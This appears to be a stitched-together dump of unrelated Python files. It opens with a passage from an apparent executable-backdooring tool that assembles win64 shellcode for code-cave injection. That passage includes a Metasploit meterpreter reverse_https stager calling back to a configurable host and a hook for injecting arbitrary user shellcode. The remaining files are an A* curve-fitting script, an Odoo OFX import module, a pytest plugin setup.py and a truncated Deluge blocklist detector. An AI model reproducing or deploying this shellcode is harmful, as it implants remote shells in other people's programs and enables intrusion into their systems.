"\x41\x59" #pop r9 now 40h
"\x68\x00\x10\x00\x00" #push 1000h
"\x41\x58" #pop r8.. now 1000h
"\x4C\x89\xF2" #mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" #push E553a458
"\x41\x5A" #pop r10
"\xff\xd5" #call rbp
"\x48\x89\xc3" #mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" #mov rdi, rax ; Prepare EDI with the new address
)
#mov rcx, 0x1abE
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<H", 583 + len(self.HOST))
self.shellcode1 += "\x00\x00"
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ( "\x5e" #pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" #rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" #call set_handler ; Configure error handling
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" #mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" #mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" #mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" #mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" #add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xE9"
self.shellcode1 += struct.pack("<H", 583 + len(self.HOST))
self.shellcode1 += "\x00\x00"
#self.shellcode1 += "\xE9\x47\x02\x00\x00"
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
"""
/*
* windows/x64/meterpreter/reverse_https - 587 bytes (stage 1)
* http://www.metasploit.com
* VERBOSE=false, LHOST=127.0.0.1, LPORT=8080,
* SessionExpirationTimeout=604800,
* SessionCommunicationTimeout=300,
* MeterpreterUserAgent=Mozilla/4.0 (compatible; MSIE 6.1;
* Windows NT), MeterpreterServerName=Apache,
* ReverseListenerBindPort=0,
* HttpUnknownRequestResponse=<html><body><h1>It
* works!</h1></body></html>, EnableStageEncoding=false,
* PrependMigrate=false, EXITFUNC=thread, AutoLoadStdapi=true,
* InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true,
* EnableUnicodeEncoding=true
*/
"""
#payload
self.shellcode2 += ("\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00"
"\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b"
"\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b"
"\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41"
"\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41"
"\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff"
"\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56"
"\x49\x89\xe6\x4c\x89\xf1\x49\xba\x4c\x77\x26\x07\x00\x00\x00"
"\x00\xff\xd5\x6a\x00\x6a\x00\x48\x89\xe1\x48\x31\xd2\x4d\x31"
"\xc0\x4d\x31\xc9\x41\x50\x41\x50\x49\xba\x3a\x56\x79\xa7\x00"
"\x00\x00\x00\xff\xd5\xe9\x9e\x00\x00\x00\x5a\x48\x89\xc1\x49"
"\xb8")
self.shellcode2 += struct.pack("<h", self.PORT)
self.shellcode2 += ("\x00\x00\x00\x00\x00\x00\x4d\x31\xc9\x41\x51\x41"
"\x51\x6a\x03\x41\x51\x49\xba\x57\x89\x9f\xc6\x00\x00\x00\x00"
"\xff\xd5\xeb\x7c\x48\x89\xc1\x48\x31\xd2\x41\x58\x4d\x31\xc9"
"\x52\x68\x00\x32\xa0\x84\x52\x52\x49\xba\xeb\x55\x2e\x3b\x00"
"\x00\x00\x00\xff\xd5\x48\x89\xc6\x6a\x0a\x5f\x48\x89\xf1\x48"
"\xba\x1f\x00\x00\x00\x00\x00\x00\x00\x6a\x00\x68\x80\x33\x00"
"\x00\x49\x89\xe0\x49\xb9\x04\x00\x00\x00\x00\x00\x00\x00\x49"
"\xba\x75\x46\x9e\x86\x00\x00\x00\x00\xff\xd5\x48\x89\xf1\x48"
"\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x52\x52\x49\xba\x2d\x06\x18"
"\x7b\x00\x00\x00\x00\xff\xd5\x85\xc0\x75\x24\x48\xff\xcf\x74"
"\x13\xeb\xb1\xe9\x81\x00\x00\x00\xe8\x7f\xff\xff\xff\x2f\x75"
"\x47\x48\x58\x00\x00\x49\xbe\xf0\xb5\xa2\x56\x00\x00\x00\x00"
"\xff\xd5\x48\x31\xc9\x48\xba\x00\x00\x40\x00\x00\x00\x00\x00"
"\x49\xb8\x00\x10\x00\x00\x00\x00\x00\x00\x49\xb9\x40\x00\x00"
"\x00\x00\x00\x00\x00\x49\xba\x58\xa4\x53\xe5\x00\x00\x00\x00"
"\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda"
"\x49\xb8\x00\x20\x00\x00\x00\x00\x00\x00\x49\x89\xf9\x49\xba"
"\x12\x96\x89\xe2\x00\x00\x00\x00\xff\xd5\x48\x83\xc4\x20\x85"
"\xc0\x74\x99\x48\x8b\x07\x48\x01\xc3\x48\x85\xc0\x75\xce\x58"
"\x58\xc3\xe8\xd7\xfe\xff\xff")
self.shellcode2 += self.HOST
self.shellcode2 += "\x00"
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def user_supplied_shellcode(self, flItms, CavesPicked={}):
"""
User supplies the shellcode, make sure that it EXITs via a thread.
"""
flItms['stager'] = True
if flItms['supplied_shellcode'] is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
self.supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ( "\x90" #<--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" #jmp to allocate
#api_call
"\x41\x51" #push r9
"\x41\x50" #push r8
"\x52" #push rdx
"\x51" #push rcx
"\x56" #push rsi
"\x48\x31\xD2" #xor rdx,rdx
"\x65\x48\x8B\x52\x60" #mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" #mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" #mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" #mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" #movzx rcx,word [rdx+74]
"\x4d\x31\xc9" #xor r9,r9
#loop_modname
"\x48\x31\xc0" #xor rax,rax
"\xac" #lods
"\x3c\x61" #cmp al, 61h (a)
"\x7c\x02" #jl 02
"\x2c\x20" #sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" #ror r9d, 13
"\x41\x01\xc1" #add r9d, eax
"\xe2\xed" #loop until read, back to xor rax, rax
"\x52" #push rdx ; Save the current position in the module list for later
"\x41\x51" #push r9 ; Save the current module hash for later
#; Proceed to itterate the export address table,
"\x48\x8b\x52\x20" #mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" #mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" #mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" #test rax, rax ; Test if no export address table is present
"\x74\x67" #je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address
"\x50" #push rax ; Save the current modules EAT
"\x8b\x48\x18" #mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" #mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
#; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" #jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
# ; And compare it to the one we wan
#loop_funcname: ;
"\x48\x31\xc0" #xor rax, rax ; Clear rax
"\xac" #lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" #ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" #add r9d, eax ; Add the next byte of the name
"\x38\xe0" #cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" #jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" #add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" #cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" #jnz get_next_func ; Go compute the next function hash if we have not found it
#; If found, fix up stack, call the function and then value else compute the next one...
"\x58" #pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" #mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" #mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" #mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" #add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" #mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" #add rax, rdx ; Add the modules base address to get the functions actual VA
#; We now fix up the stack and perform the call to the drsired function...
#finish:
"\x41\x58" #pop r8 ; Clear off the current modules hash
"\x41\x58" #pop r8 ; Clear off the current position in the module list
"\x5E" #pop rsi ; Restore RSI
"\x59" #pop rcx ; Restore the 1st parameter
"\x5A" #pop rdx ; Restore the 2nd parameter
"\x41\x58" #pop r8 ; Restore the 3rd parameter
"\x41\x59" #pop r9 ; Restore the 4th parameter
"\x41\x5A" #pop r10 ; pop off the return address
"\x48\x83\xEC\x20" #sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" #push r10 ; push back the return address
"\xFF\xE0" #jmp rax ; Jump into the required function
#; We now automagically return to the correct caller...
#get_next_mod: ;
"\x58" #pop rax ; Pop off the current (now the previous) modules EAT
#get_next_mod1: ;
"\x41\x59" #pop r9 ; Pop off the current (now the previous) modules hash
"\x5A" #pop rdx ; Restore our position in the module list
"\x48\x8B\x12" #mov rdx, [rdx] ; Get the next module
"\xe9\x57\xff\xff\xff" #jmp next_mod ; Process this module
)
self.shellcode1 += (#allocate
"\x5d" #pop rbp
"\x49\xc7\xc6" #mov r14, 1abh size of payload...
)
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode))
self.shellcode1 += ("\x00\x00"
"\x6a\x40" #push 40h
"\x41\x59" #pop r9 now 40h
"\x68\x00\x10\x00\x00" #push 1000h
"\x41\x58" #pop r8.. now 1000h
"\x4C\x89\xF2" #mov rdx, r14
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x68\x58\xa4\x53\xe5" #push E553a458
"\x41\x5A" #pop r10
"\xff\xd5" #call rbp
"\x48\x89\xc3" #mov rbx, rax ; Store allocated address in ebx
"\x48\x89\xc7" #mov rdi, rax ; Prepare EDI with the new address
)
##mov rcx, 0x1ab
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<H", len(self.supplied_shellcode))
self.shellcode1 += "\x00\x00"
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x43"
# got_payload:
self.shellcode1 += ( "\x5e" #pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" #rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" #call set_handler ; Configure error handling
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" #mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" #mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" #mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x49\xC7\xC2\x38\x68\x0D\x16" #mov r10, 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
"\xFF\xD5" # call rbp ; Spawn payload thread
"\x48\x83\xC4\x58" #add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 272).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 244).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xB8\xFF\xFF\xFF"
#Can inject any shellcode below.
self.shellcode2 += self.supplied_shellcode
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
##########################################################
# END win64 shellcodes #
##########################################################
|
# Isaac Julien
# a-star
import sys
sys.path.append('../')
import operations as ops
from exptree import ExpTree
import random
from Queue import PriorityQueue
import gen_data, expand, fit
from scipy.optimize import curve_fit
from scipy.stats import gaussian_kde
import numpy as np
import matplotlib.pyplot as plt
import warnings
import math
''' Basic implementation of A* search '''
'''
Notes:
- No pruning or limitations on operations performed on leaves
- Interpreting error as h (measure of distance to goal)
'''
class AStar:
'''
A state in the search space
'''
class AStarState:
def __init__(self, exptree, score, depth, fit_consts):
self.exptree = exptree
self.score = score
self.fit_consts = fit_consts
self.depth = depth
'''
Input = lists of x and y coordinates
'''
def __init__(self, X, Y, thresh=.1, max_iter=50, draw_graph=False):
# PLOT THE BEST ERROR OVER TIME!
# LEARN EXPANSION 'RULES' based on HOW MUCH THE ERROR IMPROVES
# Log guesses
logfile = open("./guesses", 'w')
self.X = X
self.Y = Y
self.THRESH = thresh
self.MAX_DEPTH = 10
self.MAX_ITER = max_iter
self.guesses = 5 # Number of guesses per fit
'''
For plotting purposes:
'''
self.best_err = []
exptree = ExpTree()
init_consts, init_score = self.score(exptree, exptree.constants)
init_state = AStar.AStarState(exptree, init_score, 0, init_consts)
'''
Minimum erro expression, in case we hit max_iter:
'''
self.min = init_state
self.states = PriorityQueue()
self.states.put((1, init_state))
iter = 0
while True:
if iter > self.MAX_ITER:
print "Hit max iterations. Best so far: " + str(self.min.exptree.root.collapse())
print "\tError: " + str(self.min.score)
print "\tFitted constants: " + str(self.min.fit_consts)
break
iter += 1
# Choose state to expand:
try:
state_to_expand = self.states.get(False)[1]
except:
print "Could not find any more states to expand"
break
expr_to_expand = state_to_expand.exptree
expr_str = str(expr_to_expand.root.collapse())
self.best_err.append(state_to_expand.score)
print "EXPANDING:", expr_str, state_to_expand.fit_consts, state_to_expand.score
'''
++++++++++++++++++++++++++++++++++ This is where the expansion happens: +++++++++++++++++++++++++++++++++++
'''
#children = expand.expand(expr_to_expand)
children = expand.expand_smart_two_levels(expr_to_expand)
'''
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
'''
temp = set()
for child in children:
#logfile.write(expr_str + '\t' + str(child.root.collapse()))
#logfile.write('\n')
#logfile.flush()
try:
fit_constants, score = self.score(child.root.collapse(), child.constants)
if score < 0:
print "???"
return
child_depth = state_to_expand.depth + 1
if score < self.THRESH:
self.best_err.append(score)
self.min = AStar.AStarState(child, score, child_depth, fit_constants)
print "Found solution! " + str(child.root.collapse())
print "\tError: " + str(score)
print "\tFitted constants: " + str(fit_constants)
print
return
if child_depth >= self.MAX_DEPTH:
print "\tHit maximum depth"
continue
new_state = AStar.AStarState(child, score, child_depth, fit_constants)
temp.add(new_state)
'''
Keeping track of the min state:
'''
if score < self.min.score:
#print "min:", min.exptree.root.collapse(), score
self.min = new_state
except:
print '\t' + str(child.root.collapse()) + "FAILED"
for new_state in temp:
'''
Calculate expected error of next state:
'''
er = new_state.score / (state_to_expand.score + .0001)
ee = er #er * new_state.score <--- changed this
#if ee < 0:
# ee = new_state.score
print '\t', new_state.exptree.root.collapse(), "SCORE", new_state.score, "EXPECT: ", ee
new_score = new_state.score * new_state.depth
self.states.put((new_score, new_state))
#new_err = ee + new_state.depth
#self.states.put((new_err, new_state))
'''
Return a score for the fit of exptree on x and y
'''
def score(self, exptree, constants):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
a, b = fit.sym_fit(exptree, constants, self.X, self.Y, self.guesses)
if b < 0:
return a, float("inf")
return a, b
'''
---------------------------------------------------------------------------------------------------
'''
def basic():
print "Getting data..."
expr_depth = 2
tree, constants, x, y = gen_data.get_single_expression_and_data(expr_depth)
print "Got 1000 points with 0 error for expression: " + str(tree.root.collapse())
print "With constants: " + str(constants)
print
print "Beginning A*..."
print
print
astar = AStar(x, y, False)
err = astar.best_err
plt.plot(range(len(err)), err)
plt.axis([-.1, len(err)+1, -1, max(err)+1])
plt.show()
'''
---------------------------------------------------------------------------------------------------
'''
def problem_case():
exptree = ExpTree()
exptree.apply_binary_op(exptree.root, ops.add)
l1, l2 = exptree.leaves[0], exptree.leaves[1]
exptree.apply_unary_op(l1, ops.sin)
exptree.apply_unary_op(l2, ops.tan)
x, y = gen_data.get_data(exptree, [])
print exptree.root.collapse()
print
astar = AStar(x, y, False)
err = np.array([x for x in astar.best_err if not math.isnan(x) and not math.isinf(x)])
print err
plt.plot(range(len(err)), err)
plt.axis([-.1, len(err)+1, -1, max(err)+1])
plt.show()
'''
---------------------------------------------------------------------------------------------------
'''
def real_data():
import data
'''
Which data to use:
'''
y = data.oscillator
x = [x for x in range(1,len(y)+1)]
x = [xi/float(max(x)) for xi in x]
y = [yi/float(max(y)) for yi in y]
astar = AStar(x, y, 10, 50, False)
best = astar.min
besty = gen_data.get_y_data(best.exptree, best.fit_consts, x)
plt.scatter(x, y)
plt.hold(True)
plt.plot(besty)
plt.show()
def kde():
import pyqt_fit.kernel_smoothing as smooth
import data
'''
Which data?
'''
y = np.array(data.hubbert)
x = np.array([x for x in range(1,len(y)+1)])
x = [xi/float(max(x)) for xi in x]
y = [yi/float(max(y)) for yi in y]
print "Data:", x, y
estimator = smooth.SpatialAverage(x, y)
estimate = estimator.evaluate(x)
astar = AStar(x, y, .01, 50, False)
best = astar.min
besty = gen_data.get_y_data(best.exptree, best.fit_consts, x)
print "MSE of kernel smoothing estimation: ", mse(y, estimate)
print "MSE of function-space greedy search: ", mse(y, besty)
plt.scatter(x, y, color='b')
plt.hold(True)
plt.plot(x, estimate, color='g')
plt.plot(x, besty, color='r')
plt.show()
def mse(actual, predicted):
mse = 0
for i in range(len(actual)):
diff = predicted[i] - actual[i]
mse += diff * diff
return mse
def main():
kde()
#real_data()
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
import logging
import base64
import os
from openerp.osv import osv
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
from openerp.addons.account_bank_statement_import import account_bank_statement_import as ibs
ibs.add_file_type(('ofx', 'OFX'))
try:
from ofxparse import OfxParser as ofxparser
except ImportError:
_logger.warning("OFX parser unavailable because the `ofxparse` Python library cannot be found."
"It can be downloaded and installed from `https://pypi.python.org/pypi/ofxparse`.")
ofxparser = None
class account_bank_statement_import(osv.TransientModel):
_inherit = 'account.bank.statement.import'
def process_ofx(self, cr, uid, data_file, journal_id=False, context=None):
""" Import a file in the .OFX format"""
if ofxparser is None:
raise osv.except_osv(_("Error"), _("OFX parser unavailable because the `ofxparse` Python library cannot be found."
"It can be downloaded and installed from `https://pypi.python.org/pypi/ofxparse`."))
try:
tempfile = open("temp.ofx", "w+")
tempfile.write(base64.decodestring(data_file))
tempfile.read()
pathname = os.path.dirname('temp.ofx')
path = os.path.join(os.path.abspath(pathname), 'temp.ofx')
ofx = ofxparser.parse(file(path))
except:
raise osv.except_osv(_('Import Error!'), _('Please check OFX file format is proper or not.'))
line_ids = []
total_amt = 0.00
try:
for transaction in ofx.account.statement.transactions:
bank_account_id, partner_id = self._detect_partner(cr, uid, transaction.payee, identifying_field='owner_name', context=context)
vals_line = {
'date': transaction.date,
'name': transaction.payee + ': ' + transaction.memo,
'ref': transaction.id,
'amount': transaction.amount,
'partner_id': partner_id,
'bank_account_id': bank_account_id,
}
total_amt += float(transaction.amount)
line_ids.append((0, 0, vals_line))
except Exception, e:
raise osv.except_osv(_('Error!'), _("Following problem has been occurred while importing your file, Please verify the file is proper or not.\n\n %s" % e.message))
st_start_date = ofx.account.statement.start_date or False
st_end_date = ofx.account.statement.end_date or False
period_obj = self.pool.get('account.period')
if st_end_date:
period_ids = period_obj.find(cr, uid, st_end_date, context=context)
else:
period_ids = period_obj.find(cr, uid, st_start_date, context=context)
vals_bank_statement = {
'name': ofx.account.routing_number,
'balance_start': ofx.account.statement.balance,
'balance_end_real': float(ofx.account.statement.balance) + total_amt,
'period_id': period_ids and period_ids[0] or False,
'journal_id': journal_id
}
vals_bank_statement.update({'line_ids': line_ids})
os.remove(path)
return [vals_bank_statement]
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import codecs
from setuptools import setup
def read(fname):
file_path = os.path.join(os.path.dirname(__file__), fname)
return codecs.open(file_path, encoding='utf-8').read()
setup(
name='pytest-lazy-fixture',
version='0.6.3',
author='Marsel Zaripov',
author_email='[email protected]',
maintainer='Marsel Zaripov',
maintainer_email='[email protected]',
license='MIT',
url='https://github.com/tvorog/pytest-lazy-fixture',
description='It helps to use fixtures in pytest.mark.parametrize',
long_description=read('README.rst'),
py_modules=['pytest_lazyfixture'],
install_requires=['pytest>=3.2.5'],
classifiers=[
'Development Status :: 4 - Beta',
'Framework :: Pytest',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
entry_points={
'pytest11': [
'lazy-fixture = pytest_lazyfixture',
],
},
)
|
#
# detect.py
#
# Copyright (C) 2009-2010 John Garland <[email protected]>
#
# Deluge is free software.
#
# You may redistribute it and/or modify it under the terms of the
# GNU General Public License, as published by the Free Software
# Foundation; either version 3 of the License, or (at your option)
# any later version.
#
# deluge is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with deluge. If not, write to:
# The Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor
# Boston, MA 02110-1301, USA.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
#
#
from decompressers import Zipped, GZipped, BZipped2
from readers import EmuleReader, SafePeerReader, PeerGuardianReader
COMPRESSION_TYPES = {
"PK" : "Zip",
"\x1f\x8b" : "GZip",
"BZ" : "BZip2"
}
DECOMPRESSERS = {
"Zip" : Zipped,
"GZip" : GZipped,
"BZip2" : BZipped2
}
READERS = {
"Emule" : EmuleReader,
"SafePeer" : SafePeerReader,
"PeerGuardian" : PeerGuardianReader
}
class UnknownFormatError(Exception):
pass
def detect_compression(filename):
f = open(filename, "rb")
magic_number = f.read(2)
f.close()
return COMPRESSION_TYPES.get(magic_number, "")
def detect_format(filename, compression=""):
format = ""
for reader in READERS:
if create_reader(reader, compression)(filename).is_valid():
format = reader
break
return format
def create_reader(format, compression=""):
reader = READERS.get(format)
if reader and compression:
